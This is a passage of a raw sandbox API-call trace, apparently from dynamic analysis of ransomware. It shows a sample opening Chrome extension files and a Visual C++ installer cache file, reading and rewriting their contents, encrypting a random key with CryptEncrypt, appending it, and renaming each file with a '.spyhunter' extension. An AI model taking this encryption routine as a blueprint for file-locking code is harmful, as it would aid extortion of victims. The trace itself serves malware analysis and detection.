HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.624] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0136.624] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.624] GetProcessHeap () returned 0x2c0000 [0136.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.625] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f574*=0x108, lpOverlapped=0x0) returned 1 [0136.627] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.627] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x248f574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f574*=0x108, lpOverlapped=0x0) returned 1 [0136.627] GetProcessHeap () returned 0x2c0000 [0136.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.627] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.627] WriteFile (in: hFile=0x188, lpBuffer=0x248f5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f574, lpOverlapped=0x0 | out: lpBuffer=0x248f5b4*, lpNumberOfBytesWritten=0x248f574*=0x4, lpOverlapped=0x0) returned 1 [0136.668] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f574, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f574*=0x30, lpOverlapped=0x0) returned 1 [0136.668] CloseHandle (hObject=0x188) returned 1 [0136.668] GetProcessHeap () returned 0x2c0000 [0136.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.668] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.spyhunter") returned 165 [0136.668] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0136.669] GetProcessHeap () returned 0x2c0000 [0136.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.669] GetProcessHeap () returned 0x2c0000 [0136.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.669] GetProcessHeap () returned 0x2c0000 [0136.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6cf40 | out: hHeap=0x2c0000) returned 1 [0136.671] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5b0 | out: pbBuffer=0x248f5b0) returned 1 [0136.671] GetProcessHeap () returned 0x2c0000 [0136.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.671] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5a8*=0x30) returned 1 [0136.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") returned 155 [0136.671] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.671] GetProcessHeap () returned 0x2c0000 [0136.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.672] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f56c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f56c*=0xdd, lpOverlapped=0x0) returned 1 [0136.673] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.673] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x248f56c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f56c*=0xdd, lpOverlapped=0x0) returned 1 [0136.673] GetProcessHeap () returned 0x2c0000 [0136.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.673] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.673] WriteFile (in: hFile=0x188, lpBuffer=0x248f5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f56c, lpOverlapped=0x0 | out: lpBuffer=0x248f5ac*, lpNumberOfBytesWritten=0x248f56c*=0x4, lpOverlapped=0x0) returned 1 [0136.673] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f56c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f56c*=0x30, lpOverlapped=0x0) returned 1 [0136.673] CloseHandle (hObject=0x188) returned 1 [0136.673] GetProcessHeap () returned 0x2c0000 [0136.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.674] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.spyhunter") returned 165 [0136.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0136.674] GetProcessHeap () returned 0x2c0000 [0136.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.675] GetProcessHeap () returned 0x2c0000 [0136.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.675] GetProcessHeap () returned 0x2c0000 [0136.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0136.675] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5a8 | out: pbBuffer=0x248f5a8) returned 1 [0136.675] GetProcessHeap () returned 0x2c0000 [0136.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.675] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5a0*=0x30) returned 1 [0136.675] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.720] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0136.720] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0136.720] GetProcessHeap () returned 0x2c0000 [0136.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.720] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f564*=0x2800, lpOverlapped=0x0) returned 1 [0136.792] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.792] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f564*=0x2800, lpOverlapped=0x0) returned 1 [0136.792] GetProcessHeap () returned 0x2c0000 [0136.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.792] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.792] WriteFile (in: hFile=0x180, lpBuffer=0x248f5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f564, lpOverlapped=0x0 | out: lpBuffer=0x248f5a4*, lpNumberOfBytesWritten=0x248f564*=0x4, lpOverlapped=0x0) returned 1 [0136.792] WriteFile (in: hFile=0x180, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f564, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f564*=0x30, lpOverlapped=0x0) returned 1 [0136.792] CloseHandle (hObject=0x180) returned 1 [0136.805] GetProcessHeap () returned 0x2c0000 [0136.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.805] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.spyhunter") returned 148 [0136.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.spyhunter")) returned 1 [0136.806] GetProcessHeap () returned 0x2c0000 [0136.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.806] GetProcessHeap () returned 0x2c0000 [0136.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.806] GetProcessHeap () returned 0x2c0000 [0136.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8278 | out: hHeap=0x2c0000) returned 1 [0136.806] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5a8 | out: pbBuffer=0x248f5a8) returned 1 [0136.806] GetProcessHeap () returned 0x2c0000 [0136.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.806] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5a0*=0x30) returned 1 [0136.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.807] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0136.807] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0136.807] GetProcessHeap () returned 0x2c0000 [0136.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.807] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f564, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f564*=0x5b1, lpOverlapped=0x0) returned 1 [0136.853] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.853] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x248f564, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f564*=0x5b1, lpOverlapped=0x0) returned 1 [0136.853] GetProcessHeap () returned 0x2c0000 [0136.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.854] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.854] WriteFile (in: hFile=0x188, lpBuffer=0x248f5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f564, lpOverlapped=0x0 | out: lpBuffer=0x248f5a4*, lpNumberOfBytesWritten=0x248f564*=0x4, lpOverlapped=0x0) returned 1 [0136.854] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f564, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f564*=0x30, lpOverlapped=0x0) returned 1 [0136.854] CloseHandle (hObject=0x188) returned 1 [0136.854] GetProcessHeap () returned 0x2c0000 [0136.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.854] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.spyhunter") returned 153 [0136.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.spyhunter")) returned 1 [0136.855] GetProcessHeap () returned 0x2c0000 [0136.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.855] GetProcessHeap () returned 0x2c0000 [0136.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.855] GetProcessHeap () returned 0x2c0000 [0136.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3908 | out: hHeap=0x2c0000) returned 1 [0136.856] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5a0 | out: pbBuffer=0x248f5a0) returned 1 [0136.856] GetProcessHeap () returned 0x2c0000 [0136.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.856] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f598*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f598*=0x30) returned 1 [0136.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.856] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0136.856] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0136.856] GetProcessHeap () returned 0x2c0000 [0136.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.857] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f55c*=0x1378, lpOverlapped=0x0) returned 1 [0136.948] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffec88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.949] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1378, lpNumberOfBytesWritten=0x248f55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f55c*=0x1378, lpOverlapped=0x0) returned 1 [0136.949] GetProcessHeap () returned 0x2c0000 [0136.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.949] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.949] WriteFile (in: hFile=0x188, lpBuffer=0x248f59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f55c, lpOverlapped=0x0 | out: lpBuffer=0x248f59c*, lpNumberOfBytesWritten=0x248f55c*=0x4, lpOverlapped=0x0) returned 1 [0136.949] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f55c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f55c*=0x30, lpOverlapped=0x0) returned 1 [0136.949] CloseHandle (hObject=0x188) returned 1 [0136.949] GetProcessHeap () returned 0x2c0000 [0136.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.949] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.spyhunter") returned 147 [0136.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.spyhunter")) returned 1 [0136.950] GetProcessHeap () returned 0x2c0000 [0136.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.950] GetProcessHeap () returned 0x2c0000 [0136.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.950] GetProcessHeap () returned 0x2c0000 [0136.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0f3f8 | out: hHeap=0x2c0000) returned 1 [0136.952] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f598 | out: pbBuffer=0x248f598) returned 1 [0136.952] GetProcessHeap () returned 0x2c0000 [0136.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.952] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f590*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f590*=0x30) returned 1 [0136.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") returned 155 [0136.953] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.953] GetProcessHeap () returned 0x2c0000 [0136.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.953] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f554, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f554*=0xfb, lpOverlapped=0x0) returned 1 [0136.954] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.954] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x248f554, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f554*=0xfb, lpOverlapped=0x0) returned 1 [0136.954] GetProcessHeap () returned 0x2c0000 [0136.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.954] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, 